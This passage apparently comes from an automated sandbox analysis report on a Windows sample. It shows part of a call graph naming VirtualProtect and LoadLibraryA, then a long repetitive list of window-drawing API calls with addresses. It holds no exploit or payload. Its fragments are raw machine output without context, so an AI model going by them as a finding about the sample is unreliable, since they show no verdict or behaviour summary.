12242->12243 12244 220382f VirtualFree 12243->12244 12244->12227 12247 2203429 12245->12247 12249 2203424 12248->12249 12250 220389f VirtualProtect 12249->12250 12250->12204 12252 22046c7 12251->12252 12253 22046ce 12251->12253 12252->12209 12253->12252 12256 2203904 12253->12256 12255->12214 12257 2203424 12256->12257 12258 220390f LoadLibraryA 12257->12258 12258->12253 12259->12177 12261 22014a0 2 API calls 12260->12261 12262 22015c7 12261->12262 12263 2201609 12262->12263 12264 2200000 9 API calls 12262->12264 12266 2203124 6 API calls 12263->12266 12267 22056f4 6 API calls 12263->12267 12264->12263 12265 220164d 12266->12265 12267->12265
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000007B), ref: 0040B567
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B578
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040B61C
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040B648
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040B662
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040B727
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040B7F6
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040B849
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040BA7C
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BC9C
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BCEF
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BD75
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040BE92
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040BEE3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BF69
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C00C
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C0C1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C171
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C19D
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C1F0
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C33F
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C385
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C41F
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C465
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040C557
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C5C8
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C748
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C774
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C7C7
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040C84D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C8E1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040C985
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CA25
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040CAC9
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040CBA1
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040CBF4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040CC7A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040CD1D
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CD63
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CE92
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D018
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D044
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D0B7
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D23D
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D269
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D283
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D303
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D349
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D491
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D4BD
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D510
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D596
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D69C
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040D740
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D786
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D835
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D861
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D8B4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
